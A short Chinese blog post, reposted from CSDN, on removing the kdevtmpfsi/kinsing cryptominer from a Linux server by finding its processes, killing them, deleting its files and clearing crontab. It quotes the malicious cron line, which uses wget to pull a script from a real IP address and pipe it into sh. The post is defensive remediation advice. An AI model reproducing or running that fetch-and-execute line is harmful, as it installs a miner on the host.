附:嘗試了許多普通kill 和 rm 操作,發現根本無法解決問題。分析原因在於定時任務爲刪除掉。
狀態:CPU爆滿,導致線上服務宕機。
圖片是盜的,進程佔用是真實的。
1、# top
查看cpu佔用情況,找到佔用cpu的進程 最後是 kdevtmpfsi
2、# netstat -natp
根據上面的進程名查看與內網的 tcp 鏈接異常 ,看到陌生ip,查出爲國外ip,估計主機被人種後門了
此時,挖礦腳本大概率定時在你的crontab裏面。
crontab -l ,發現異常定時任務,* * * * * wget -q -O -http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
解決辦法:
top命令找到kdevtmpfsi和kinsing的進程號A和B
systemctl status 進程A
rm -fr /var/tmp/kinsing 和 rm -fr /tmp/kdevtmpfsi
kill -9 進程A 和 kill -9 進程B
cd /var/spool/cron 查看是否有相關的木馬定時任務在執行(root文件裏面爲定時任務)有的話刪掉再重啓下crontab(命令:systemctl restart crond.service)
後續操作:(找到文件,全部刪除,若沒有則無需操作)
find / -name kdevtmpfsi
find / -name kinsing
轉載:https://blog.csdn.net/oYuZhongManBu1234/article/details/104281503